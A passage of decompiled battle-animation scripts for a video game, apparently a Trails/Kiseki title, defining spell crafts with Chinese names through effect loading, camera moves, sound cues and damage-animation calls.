PlayEffect(0xFF, 0xFB, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, 4)
Sleep(1000)
Yield()
BlurSwitch(0x12C, 0xBBFFFFFF, 0x0, 0x0, 0x4)
AS_B0(0x14, 0xBB8)
Sleep(3200)
Yield()
SetCameraDistance(30000, 300)
AS_B0(0x1E, 0x12C)
Sleep(300)
Yield()
CancelBlur(500)
Fade(0x1, 300, 0x0)
AS_5F(0xF7, 0x1)
Sleep(200)
Yield()
ResetTarget()
label("loc_24E3")
ForeachTarget("loc_250C")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(200)
Yield()
NextTarget()
Jump("loc_24E3")
label("loc_250C")
ResetBrightness(500)
BeginChrThread(0xFF, 3, "loc_2", 0x0)
WaitEffect(0xFF, 0x4)
Call("loc_1D5")
Sleep(600)
Yield()
SetBrightness(0x0, 0x1, 0)
WaitChrThread(0xFF, 3)
AS_8F(0x0)
Fade(0x1, 300, 0x0)
AS_31(0x17, 0x0)
LockCamera(0xFB, 0, 0, 0, 0)
Return()
# 雷光龙卷 end
def Craft_终焉三重奏(): pass
label("终焉三重奏")
ResetTarget()
AS_78(1)
LoadEffect(0x1, "battle\\mg045_01.eff")
LoadEffect(0x2, "battle\\mg045_02.eff")
LoadEffect(0x3, "battle\\mg045_03.eff")
LoadEffect(0x4, "battle\\mg045_04.eff")
LoadEffect(0x5, "battle\\mg045_05.eff")
LoadEffect(0x6, "battle\\mg045_06.eff")
AS_78(0)
Call("loc_17D")
ClearChipModeFlags(0x0, 0xFC, 0x1)
AS_34()
Fade(0x1, 1000, 0x0)
AS_AC(0x3E8, 0xFFFFFFFF)
LockCamera(0xFD, 0, 14400, -12000, 0)
SetCameraDegree(0, -10, 0, 0)
SetCameraDistance(32000, 0)
SetCameraDistance(27500, 2000)
SoundEx(132, 0x1)
PlayEffect(0xFF, 0xFD, 0x4, 0x0, 0, 10000, -10000, 0, 0, 0, 1000, 1000, 1000, 3)
PlayEffect(0xFF, 0xFD, 0x6, 0x0, 0, 12000, -10000, 0, 0, 0, 600, 600, 600, 6)
SoundEx(359, 0x1)
Sleep(2400)
Yield()
CancelEffect(0xFF, 0x6)
Sleep(100)
Yield()
PlayEffect(0xFF, 0xFD, 0x5, 0x0, 0, 13000, -10000, 0, 0, 0, 1000, 1000, 1000, 5)
SoundEx(200, 0x0)
Sleep(300)
Yield()
CancelEffect(0xFF, 0x4)
SetBattleSpeed(600)
StopSound(359)
PlayEffect(0xFF, 0xFD, 0x1, 0x0, 0, 13000, -10000, 0, 0, 0, 1000, 1000, 1000, 4)
Sleep(500)
Yield()
CancelEffect(0xFF, 0x5)
CancelEffect(0xFF, 0x2)
SoundEx(359, 0x1)
LockCamera(0xFD, 0, 11000, -11700, 0)
SetCameraDistance(3850, 0)
AS_B0(0xFFEC, 0x0)
Fade(0x1, 500, 0x0)
CancelEffect(0xFF, 0x3)
LockCamera(0xFD, 0, 20200, -11700, 2000)
AS_B0(0xA, 0x7D0)
Sleep(1800)
Yield()
StopSound(359)
Fade(0x1, 500, 0x0)
LockCamera(0xFD, 0, 14300, -11100, 0)
SetCameraDistance(32000, 0)
AS_B0(0xFFF6, 0x0)
Sleep(300)
Yield()
CancelEffect(0xFF, 0x5)
SetBattleSpeed(1000)
PlayEffect(0xFF, 0xFD, 0x5, 0x0, 0, 13000, -10000, 0, 0, 0, 800, 800, 800, 5)
AS_1A(0xFF, 0x5, 0x7D0)
StopSound(132)
Sleep(1150)
Yield()
Fade(0x1, 500, 0x0)
LockCamera(0xFD, 8000, 500, 8000, 0)
AS_0B(0x1E, 0x0)
AS_B0(0xA, 0x0)
AS_3C(0x5, 0x0)
SetCameraDistance(27000, 0)
StopEffect(0xFF, 0x2)
StopEffect(0xFF, 0x3)
StopEffect(0xFF, 0x4)
ChrSetPos(0xFF, 0xF3, 0, 0, 0)
AS_8D(0x1, 0x0, 0x0, 0x0, 0x0)
ResetTarget()
label("loc_27B2")
ForeachTarget("loc_27D8")
AS_05(0xFE, 0x2, 0x0)
def lambda_27C0():
AS_21(0x1, 0xFF, -2500, 0)
Return()
QueueWorkItem(0xFE, 1, lambda_27C0)
TurnDirection(0xFE, 0xFF, 0, 0, 0x0)
NextTarget()
Jump("loc_27B2")
label("loc_27D8")
WaitChrThread(0xFC, 1)
AS_5F(0xFC, 0x0)
Sleep(500)
Yield()
PlayEffect(0xFF, 0xFD, 0x5, 0x0, 8000, 0, 8000, 0, 0, 0, 1000, 1000, 1000, 5)
AS_1A(0xFF, 0x5, 0xFA0)
AS_0B(0x2D, 0x320)
AS_B0(0x1E, 0x320)
SetCameraDistance(32000, 800)
PlayEffect(0xFF, 0xFD, 0x4, 0x0, 0, 10000, -10000, 0, 0, 0, 1000, 1000, 1000, 3)
AS_1A(0xFF, 0x3, 0x2710)
Sleep(300)
Yield()
ResetTarget()
label("loc_283E")
ForeachTarget("loc_2849")
DamageAnime(0xFE, 0x0, 0x32)
NextTarget()
Jump("loc_283E")
label("loc_2849")
Sleep(850)
Yield()
Fade(0x1, 1000, 0x0)
AS_5F(0xFC, 0x0)
LockCamera(0xFD, 8000, 35900, 8000, 0)
SetCameraDistance(12800, 0)
AS_0B(0xF, 0x0)
AS_B0(0xFFE7, 0x0)
AS_3C(0xFFF6, 0x0)
StopEffect(0xFF, 0x2)
StopEffect(0xFF, 0x3)
PlayEffect(0xFF, 0xFD, 0x1, 0x0, 8000, 36500, 8000, 0, 0, 0, 1000, 1000, 1000, 2)
AS_1A(0xFF, 0x2, 0x1770)
SoundEx(238, 0x0)
Sleep(400)
Yield()
SoundEx(339, 0x0)
Sleep(600)
Yield()
SoundEx(375, 0x0)
Sleep(1000)
Yield()
LockCamera(0xFD, 8000, 36500, 8000, 300)
SetCameraDistance(28000, 300)
Sleep(200)
Yield()
BlurSwitch(0x258, 0xBBFFFFFF, 0x1, 0x1, 0xA)
SetBattleSpeed(400)
Sleep(300)
Yield()
SetBattleSpeed(1000)
Sleep(1200)
Yield()
LockCamera(0xFD, 8000, 1000, 8000, 500)
AS_B0(0x5, 0x1F4)
Sleep(500)
Yield()
CancelBlur(500)
PlayEffect(0xFF, 0xFD, 0x2, 0x0, 8000, 0, 8000, 0, 0, 0, 750, 750, 750, 3)
SoundEx(210, 0x0)
SetCameraDistance(26000, 300)
AS_0B(0x0, 0x9C4)
AS_B0(0xF, 0x9C4)
Sleep(1200)
Yield()
SetCameraDistance(33000, 2500)
Sleep(500)
Yield()
PlayEffect(0xFF, 0xFD, 0x3, 0x0, 8000, 0, 8000, 0, 0, 0, 800, 800, 800, 4)
BlurSwitch(0x1F4, 0xBBFFFFFF, 0x0, 0x1, 0x7)
AS_A6(0xFF, 0x4, 0x4B0, 0x3E8, 0x0)
SoundEx(359, 0x1)
Sleep(1000)
Yield()
AS_43(0x0, 0x1F4, 0xFFFFFFFF)
CancelBlur(1000)
Sleep(1000)
Yield()
AS_A8(0x0, 0x0)
AS_A8(0x0, 0x1)
AS_A8(0x0, 0x2)
AS_A8(0x0, 0x3)
AS_A8(0x0, 0x4)
AS_A8(0x0, 0x5)
AS_A8(0x0, 0x6)
StopSound(359)
Sleep(500)
Yield()
AS_8D(0xA, 0x0, 0x0, 0x0, 0x0)
Call("loc_1D5")
Call("loc_1A3")
EndChrThread(0xFC, 1)
Call("loc_1CA")
Return()
# 终焉三重奏 end
def Craft_2E_46_29DE(): pass
label("Craft_2E_46_29DE")
Return()
# Craft_2E_46_29DE end
def Craft_2F_47_29DF(): pass
label("Craft_2F_47_29DF")
Jump("Craft_11_17_D69")
# Craft_2F_47_29DF end
def Craft_暴风之符文(): pass
label("暴风之符文")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg048_00.eff")
LoadEffect(0x3B, "battle\\mg048_01.eff")
LoadEffect(0x3C, "battle\\mg018_02.eff")
LoadEffect(0x3D, "battle\\mg048_03.eff")
AS_78(0)
Call("loc_17D")
Call("loc_BE6")
Return()
# 暴风之符文 end
def Craft_心灵之霞(): pass
label("心灵之霞")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg050_00.eff")
LoadEffect(0x1, "battle\\mg050_01.eff")
AS_78(0)
Sleep(250)
Yield()
PlayEffect(0xFF, 0xF9, 0x0, 0x4, 0, 0, 500, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1500)
Yield()
LockCamera(0xFE, 0, 0, 0, 300)
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
# 心灵之霞 end
def Craft_死亡螺旋(): pass
label("死亡螺旋")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg051_00.eff")
LoadEffect(0x1, "battle\\mg051_01.eff")
AS_78(0)
Sleep(250)
Yield()
LockCamera(0xFE, 0, 0, 0, 600)
SetCameraDistance(22000, 600)
Sleep(450)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1300)
Yield()
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(2000)
Yield()
Call("loc_2")
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
# 死亡螺旋 end
def Craft_暗影裁决(): pass
label("暗影裁决")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg052_00.eff")
LoadEffect(0x1, "battle\\mg052_01.eff")
LoadEffect(0x2, "battle\\mg052_02.eff")
AS_78(0)
Sleep(200)
Yield()
SetBrightness(0x0, 0x0, 500)
AS_43(0x0, 0x1F4, 0x0)
Sleep(800)
Yield()
Fade(0x1, 500, 0x0)
AS_60(0xF7)
LockCamera(0xFD, -1500, -25000, -4000, 0)
SetCameraDegree(0, 320, -22, 0)
SetCameraDistance(50000, 0)
PlayEffect(0xFF, 0xFD, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, 2)
AS_3D(50, 50, 50, 1800)
LockCamera(0xFD, 1100, 5000, 0, 1600)
Sleep(200)
Yield()
SetCameraDistance(13000, 1300)
SetCameraDegree(20, 300, -22, 1200)
Sleep(1200)
Yield()
BlurSwitch(0xC8, 0xBBFFFFFF, 0x0, 0x1, 0x7)
LockCamera(0xFD, 1800, 15000, 4000, 400)
AS_43(0x0, 0x12C, 0x0)
SetCameraDistance(5000, 300)
Sleep(300)
Yield()
StopEffect(0xFF, 0x2)
CancelBlur(0)
Fade(0x1, 300, 0x0)
ResetBrightness(500)
AS_5F(0xF7, 0x1)
AS_31(0x17, 0x0)
LockCamera(0xF4, 0, 3000, 0, 0)
SetCameraDistance(25000, 0)
AS_B0(0x21, 0x0)
Sleep(500)
Yield()
PlayEffect(0xFE, 0xF2, 0x0, 0x0, 0, 200, 0, 0, 0, 0, 1000, 1000, 1000, 3)
AS_1A(0xFE, 0x3, 0xBB8)
LockCamera(0xF4, 0, 0, 0, 400)
Sleep(1200)
Yield()
ResetTarget()
label("loc_2CC8")
ForeachTarget("loc_2CF1")
PlayEffect(0xFF, 0xFF, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(100)
Yield()
NextTarget()
Jump("loc_2CC8")
label("loc_2CF1")
Sleep(1600)
Yield()
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTargetAdd(0xFF, "", 0x0)
LookingTarget(300, 28, 20)
AS_B0(0x16, 0x320)
PlayEffect(0xFF, 0xF9, 0x2, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(300)
Yield()
BeginChrThread(0xFF, 3, "loc_2", 0x0)
Sleep(2500)
Yield()
SetBrightness(0x0, 0x1, 0)
WaitEffect(0xFF, 0x4)
AS_14(0x1)
AS_14(0x2)
Call("loc_1D5")
Return()
# 暗影裁决 end
def Craft_灾厄镰刃(): pass
label("灾厄镰刃")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg053_00.eff")
LoadEffect(0x1, "battle\\mg050_01.eff")
AS_78(0)
SoundEx(222, 0x0)
Sleep(250)
Yield()
PlayEffect(0xFF, 0xFF, 0x0, 0x4, 0, 0, 500, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1100)
Yield()
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(300, 20, 30)
Sleep(400)
Yield()
ResetTarget()
AS_83(0x0)
label("loc_2DB0")
ForeachTarget("loc_2DDF")
PlayEffect(0xFF, 0xF8, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
DamageAnime(0xFE, 0x0, 0x32)
DamageCue(0xFE)
Sleep(100)
Yield()
NextTarget()
Jump("loc_2DB0")
label("loc_2DDF")
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
WaitChrThread(0xFF, 3)
AS_8F(0x0)
Fade(0x1, 300, 0x0)
AS_31(0x17, 0x0)
Return()
# 灾厄镰刃 end
def Craft_堕天使暗翼(): pass
label("堕天使暗翼")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg054_00.eff")
LoadEffect(0x1, "battle\\mg054_01.eff")
LoadEffect(0x2, "battle\\mg054_02.eff")
LoadEffect(0x3, "battle\\mg054_03.eff")
AS_78(0)
Call("loc_17D")
AS_60(0xFC)
AS_8D(0xB, 0x0, 0x0, 0x0, 0x0)
ChrSetPos(0xFF, 0xF3, 0, 0, -2500)
AS_AC(0x1F4, 0xFFFFFFFF)
LockCamera(0xF3, 0, 100, -9500, 0)
SetCameraDegree(320, 30, -8, 0)
SetCameraDistance(15000, 0)
SetCameraDegree(180, 26, 0, 4500)
SetCameraDistance(8300, 4500)
PlayEffect(0xFF, 0xF3, 0x0, 0x0, 0, 0, -9500, 0, 0, 0, 1000, 1000, 1000, 2)
PlayEffect(0xFF, 0xF3, 0x3, 0x0, 0, 0, -9500, 0, 0, 0, 1000, 1000, 1000, 3)
SoundEx(215, 0x0)
AS_52(0x1)
label("loc_2EF6")
ForeachTarget("loc_2F0B")
Jc(0x4, 0x2, 0x100, "loc_2F07")
AS_53(0x1)
Jump("loc_2F0B")
label("loc_2F07")
NextTarget()
Jump("loc_2EF6")
label("loc_2F0B")
ResetTarget()
ResetTarget()
AS_83(0x0)
Jc(0x5, 0x1, 0x1, "loc_2F2D")
AS_8D(0x7, 0xFC, 0x1F4, 0x1F4, 0x1F4)
Jump("loc_2F3F")
label("loc_2F2D")
AS_8D(0x7, 0xFC, 0x12C, 0x12C, 0x12C)
label("loc_2F3F")
Sleep(4100)
Yield()
AS_5F(0xFC, 0x0)
SetCameraDegree(180, -2, 0, 1500)
Sleep(400)
Yield()
PlayEffect(0xFF, 0xF3, 0x2, 0x0, 0, 0, -9500, 0, 0, 0, 1000, 1000, 1000, 4)
SetCameraDistance(20000, 1000)
Sleep(500)
Yield()
LockCamera(0xF3, 0, 1600, -8500, 2000)
SetCameraDegree(180, 0, 0, 2000)
SetCameraDistance(38000, 2000)
Sleep(1000)
Yield()
StopEffect(0xFF, 0x2)
CancelEffect(0xFF, 0x3)
PlayEffect(0xFF, 0xF3, 0x1, 0x0, 0, 0, -9500, 0, 0, 0, 1000, 1000, 1000, 3)
SetCameraDistance(40000, 3500)
SetCameraDegree(205, -10, 0, 3500)
AS_A6(0xFF, 0x3, 0x4B0, 0x3E8, 0x0)
Sleep(3200)
Yield()
SoundEx(173, 0x0)
AS_43(0x0, 0x1F4, 0xFFFFFFFF)
Sleep(1000)
Yield()
EndChrThread(0xFC, 1)
AS_A8(0x0, 0x0)
AS_A8(0x0, 0x1)
AS_A8(0x0, 0x2)
AS_A8(0x0, 0x3)
Call("loc_1D5")
AS_6E(0x40000)
Fade(0x1, 500, 0x0)
AS_7A(0x1)
ShowChr(0xFF, 0)
AS_5F(0xF7, 0x0)
ResetBrightness(0)
SetBrightness(0x0, 0x1, 0)
AS_31(0x17, 0x0)
AS_31(0x3, 0x0)
Call("loc_2")
AS_8F(0x0)
AS_31(0x17, 0x3E8)
Return()
# 堕天使暗翼 end
def Craft_37_55_3063(): pass
label("Craft_37_55_3063")
Return()
# Craft_37_55_3063 end
def Craft_38_56_3064(): pass
label("Craft_38_56_3064")
Return()
# Craft_38_56_3064 end
def Craft_39_57_3065(): pass
label("Craft_39_57_3065")
Jump("Craft_11_17_D69")
# Craft_39_57_3065 end
def Craft_刹那之符文(): pass
label("刹那之符文")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg058_00.eff")
LoadEffect(0x3B, "battle\\mg058_01.eff")
LoadEffect(0x3C, "battle\\mg018_02.eff")
LoadEffect(0x3D, "battle\\mg058_03.eff")
AS_78(0)
Call("loc_17D")
Call("loc_BE6")
Return()
# 刹那之符文 end
def Craft_暗物质(): pass
label("暗物质")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg060_00.eff")
AS_78(0)
Sleep(400)
Yield()
LockCamera(0xFB, 0, 1000, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFB, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, 2)
AS_3D(100, 100, 100, 1400)
Sleep(1000)
Yield()
AS_8D(0x9, 0x3, 0x7D0, 0x0, 0x0)
AS_8D(0x7, 0xFC, 0x3E8, 0x384, 0x3E8)
Sleep(300)
Yield()
AS_8D(0x7, 0xFC, 0x3E8, 0x320, 0x3E8)
Sleep(300)
Yield()
AS_8D(0x7, 0xFC, 0x3E8, 0x384, 0x3E8)
Sleep(300)
Yield()
AS_8D(0x7, 0xFC, 0x3E8, 0x320, 0x3E8)
Sleep(300)
Yield()
AS_8D(0x7, 0xFC, 0x3E8, 0x2BC, 0x3E8)
Sleep(200)
Yield()
AS_52(0x5)
label("loc_31AC")
Jc(0x5, 0x3, 0x0, "loc_31E6")
AS_8D(0x7, 0xFC, 0x3E8, 0x258, 0x3E8)
Sleep(100)
Yield()
AS_8D(0x7, 0xFC, 0x3E8, 0x1F4, 0x3E8)
Sleep(100)
Yield()
AS_53(0x1)
Jump("loc_31AC")
label("loc_31E6")
CancelEffect(0xFF, 0x2)
AS_8D(0xA, 0x0, 0x0, 0x0, 0x0)
Call("loc_2")
AS_8D(0x7, 0xFC, 0x3E8, 0x2BC, 0x3E8)
Sleep(100)
Yield()
AS_8D(0x7, 0xFC, 0x3E8, 0x384, 0x3E8)
Sleep(100)
Yield()
AS_8D(0x7, 0xFC, 0x3E8, 0x3E8, 0x3E8)
AS_3D(200, 200, 200, 500)
WaitEffect(0xFF, 0x2)
FreeEffect(0x0)
Return()
# 暗物质 end
def Craft_光子飞射(): pass
label("光子飞射")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg061_00.eff")
AS_78(0)
SoundEx(199, 0x0)
Sleep(250)
Yield()
PlayEffect(0xFF, 0xF9, 0x0, 0x4, 0, 0, 500, 0, 0, 0, 800, 800, 800, -1)
Sleep(1000)
Yield()
LockCamera(0xFE, 0, 0, 0, 300)
Sleep(200)
Yield()
DamageCue(0xFE)
AS_14(0x0)
FreeEffect(0x0)
Return()
# 光子飞射 end
def Craft_大灾变(): pass
label("大灾变")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg062_00.eff")
LoadEffect(0x1, "battle\\mg062_01.eff")
AS_78(0)
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(300, 28, 20)
Sleep(600)
Yield()
AS_3D(500, 500, 500, 1800)
SoundEx(247, 0x0)
Sleep(500)
Yield()
PlayEffect(0xFF, 0xFF, 0x0, 0x4, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1000)
Yield()
BlurSwitch(0x12C, 0xBBFFFFFF, 0x0, 0x0, 0x1)
Sleep(500)
Yield()
Jc(0x16, 0x1, 0x0, "loc_3347")
LockCamera(0xFF, 0, -3500, 0, 500)
Jump("loc_335A")
label("loc_3347")
ForeachTarget("loc_335A")
LockCamera(0xFC, 0, -3500, 0, 500)
label("loc_335A")
Sleep(400)
Yield()
SetBrightness(0x0, 0x0, 300)
Fade(0x1, 300, 0x0)
CancelBlur(200)
BlurSwitch(0x12C, 0xBBFFFFFF, 0x0, 0x0, 0x1)
FreeEffect(0x0)
CancelEffect(0xFF, 0x4)
AS_60(0xF7)
AS_5F(0xFC, 0x0)
AS_8D(0xF, 0x0, 0x0, 0x0, 0x0)
AS_03(0xFC, 0xB4)
LockCamera(0xFD, 0, 0, 0, 0)
SetCameraDegree(25, 35, 0, 0)
Sleep(100)
Yield()
SetCameraDistance(26000, 300)
PlayEffect(0xFF, 0xFD, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
SetCameraDistance(30000, 1000)
Sleep(1000)
Yield()
Fade(0x1, 400, 0x0)
SetCameraDistance(18000, 200)
CancelBlur(200)
Sleep(200)
Yield()
BlurSwitch(0xC8, 0xBBFFFFFF, 0x0, 0x1, 0x5)
SetCameraDistance(25000, 3000)
Sleep(500)
Yield()
AS_3D(300, 300, 200, 5500)
Sleep(1500)
Yield()
AS_B0(0x8, 0x9C4)
Sleep(1200)
Yield()
SetCameraDegree(25, 35, -7, 0)
Sleep(800)
Yield()
AS_60(0xF7)
Sleep(2500)
Yield()
Fade(0x1, 500, 0x0)
CancelBlur(500)
ResetBrightness(0)
SetBrightness(0x0, 0x1, 0)
AS_31(0x17, 0x0)
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(0, 22, 32)
AS_8D(0xA, 0x0, 0x0, 0x0, 0x0)
AS_0A(0xFC, 0x1, 0x0, 0x0)
AS_7A(0x1)
AS_5F(0xF7, 0x1)
Sleep(100)
Yield()
BeginChrThread(0xFF, 3, "loc_2", 0x0)
AS_14(0x1)
Call("loc_1D5")
WaitChrThread(0xFF, 3)
AS_8F(0x0)
Fade(0x1, 500, 0x0)
AS_31(0x17, 0x0)
LockCamera(0xFF, 0, 0, 0, 0)
Return()
# 大灾变 end
def Craft_金耀辉环(): pass
label("金耀辉环")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg063_00.eff")
LoadEffect(0x1, "battle\\mg063_01.eff")
AS_78(0)
Sleep(250)
Yield()
LockCamera(0xFB, 0, 0, 0, 600)
SetCameraDistance(18700, 1000)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFB, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 550, 550, 550, -1)
PlayEffect(0xFF, 0xFB, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 550, 550, 550, -1)
Sleep(800)
Yield()
Sleep(700)
Yield()
AS_B0(0x15, 0x7D0)
LockCamera(0xFB, 0, 1200, 0, 2400)
SetCameraDistance(21000, 2400)
Sleep(3000)
Yield()
Fade(0x1, 500, 0x0)
AS_31(0x17, 0x0)
LockCamera(0xFB, 0, 0, 0, 0)
Sleep(800)
Yield()
CancelBlur(500)
Call("loc_2")
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
AS_8F(0x0)
Fade(0x1, 300, 0x0)
AS_31(0x17, 0x0)
LockCamera(0xFB, 0, 0, 0, 0)
Return()
# 金耀辉环 end
def Craft_天劫轮回光(): pass
label("天劫轮回光")
AS_78(1)
LoadEffect(0x0, "battle\\mg064_00.eff")
LoadEffect(0x1, "battle\\mg064_01.eff")
LoadEffect(0x2, "battle\\mg064_02.eff")
LoadEffect(0x3, "battle\\mg064_03.eff")
LoadEffect(0x4, "battle\\mg064_04.eff")
LoadEffect(0x5, "battle/sc036000.eff")
LoadEffect(0x6, "battle/ms00001.eff")
LoadEffect(0x7, "battle\\mg064_05.eff")
AS_78(0)
ResetTarget()
Call("loc_17D")
ClearChipModeFlags(0x0, 0xFC, 0x1)
AS_3E(0x1F4, 0x0)
AS_5F(0xFC, 0x0)
AS_8D(0xB, 0x0, 0x0, 0x0, 0x0)
LockCamera(0xF3, 0, 0, 0, 0)
SetCameraDegree(138, 39, 0, 0)
SetCameraDistance(21000, 0)
AS_AC(0x3E8, 0xFFFFFFFF)
LockCamera(0xF3, 0, 1500, 0, 3500)
SetCameraDistance(17500, 3500)
SetCameraDegree(0, -5, 10, 3000)
PlayEffect(0xFF, 0xFF, 0x5, 0x1, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, 4)
SetEffectColor(0xFF, 129, 0xFFFCDE69)
Sleep(700)
Yield()
PlayEffect(0xFF, 0xF3, 0x4, 0x0, 0, 3000, 0, 0, 0, 0, 400, 400, 400, 3)
SoundEx(359, 0x1)
Sleep(800)
Yield()
PlayEffect(0xFF, 0xF3, 0x3, 0x0, 0, 4000, 10000, 0, 0, 0, 1100, 1100, 1100, -1)
Sleep(1500)
Yield()
CancelEffect(0xFF, 0x3)
StopSound(359)
Sleep(500)
Yield()
PlayEffect(0xFF, 0xF3, 0x6, 0x0, 0, 4000, 10000, 0, 0, 0, 1800, 1800, 1800, -1)
SetEffectColor(0xFF, 129, 0xFFDD71F9)
CancelEffect(0xFF, 0x4)
Sleep(1500)
Yield()
SetBattleSpeed(850)
PlayEffect(0xFF, 0xF3, 0x0, 0x0, 0, 4000, 9500, 0, 0, 0, 500, 500, 500, 2)
SetCameraDistance(19000, 2200)
SetBattleSpeed(650)
Sleep(2600)
Yield()
PlayEffect(0xFF, 0xF3, 0x1, 0x0, 0, 4000, 10000, 0, 0, 0, 400, 400, 400, -1)
Sleep(200)
Yield()
BlurSwitch(0x0, 0xBBFFFFFF, 0x0, 0x1, 0x1)
ResetTarget()
label("loc_37D8")
ForeachTarget("loc_3802")
def lambda_37DF():
ChrMove(0xFF, 0xF3, 0, 3500, 10000, 3000, 0x0)
Return()
QueueWorkItem(0xFE, 1, lambda_37DF)
BeginChrThread(0xFE, 3, "loc_393C", 0x0)
Sleep(30)
Yield()
NextTarget()
Jump("loc_37D8")
label("loc_3802")
Sleep(2300)
Yield()
PlayEffect(0xFF, 0xF3, 0x7, 0x0, 0, 3500, 9500, 0, 0, 0, 500, 500, 500, 2)
Sleep(2000)
Yield()
AS_A8(0x0, 0x3)
Sleep(400)
Yield()
AS_A8(0x0, 0x1)
PlayEffect(0xFF, 0xF3, 0x5, 0x1, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
SetEffectColor(0xFF, 129, 0xFFFCDE69)
SoundEx(359, 0x1)
AS_A6(0xFF, 0x2, 0x2EE, 0x640, 0x0)
SoundEx(269, 0x0)
CancelBlur(1000)
Sleep(500)
Yield()
StopSound(359)
SetBattleSpeed(1000)
PlayEffect(0xFF, 0xF3, 0x6, 0x0, 0, 4000, 10000, 0, 0, 0, 3000, 3000, 3000, -1)
SoundEx(566, 0x0)
Sleep(100)
Yield()
PlayEffect(0xFF, 0xF3, 0x2, 0x0, 0, 3500, 9500, -20, 0, 0, 750, 750, 750, 3)
BlurSwitch(0x190, 0xBBFFFFFF, 0x0, 0x1, 0x1)
SetCameraDistance(4000, 2000)
AS_3E(0x3E8, 0x7D0)
SetBattleSpeed(800)
SoundEx(220, 0x0)
Sleep(1000)
Yield()
CancelEffect(0xFF, 0x2)
Sleep(1000)
Yield()
CancelBlur(1000)
AS_43(0x0, 0x1F4, 0xFFFFFFFF)
Sleep(1000)
Yield()
SetBattleSpeed(1000)
AS_8D(0xA, 0x0, 0x0, 0x0, 0x0)
AS_A8(0x0, 0x0)
AS_A8(0x0, 0x1)
AS_A8(0x0, 0x2)
AS_A8(0x0, 0x3)
AS_A8(0x0, 0x4)
AS_A8(0x0, 0x5)
AS_A8(0x0, 0x6)
AS_A8(0x0, 0x7)
Call("loc_1D5")
AS_6E(0x40000)
Call("loc_1A3")
EndChrThread(0xFC, 1)
Call("loc_1CA")
Return()
label("loc_393C")
AS_8D(0x7, 0xFF, 0x3B6, 0x3B6, 0x3B6)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x384, 0x384, 0x384)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x352, 0x352, 0x352)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x320, 0x320, 0x320)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x2EE, 0x2EE, 0x2EE)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x2BC, 0x2BC, 0x2BC)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x28A, 0x28A, 0x28A)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x258, 0x258, 0x258)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x226, 0x226, 0x226)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x1F4, 0x1F4, 0x1F4)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x1C2, 0x1C2, 0x1C2)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x190, 0x190, 0x190)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x15E, 0x15E, 0x15E)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x12C, 0x12C, 0x12C)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0xFA, 0xFA, 0xFA)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0xC8, 0xC8, 0xC8)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x96, 0x96, 0x96)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x64, 0x64, 0x64)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x32, 0x32, 0x32)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x0, 0x0, 0x0)
Sleep(150)
Yield()
Return()
# 天劫轮回光 end
def Craft_41_65_3AF5(): pass
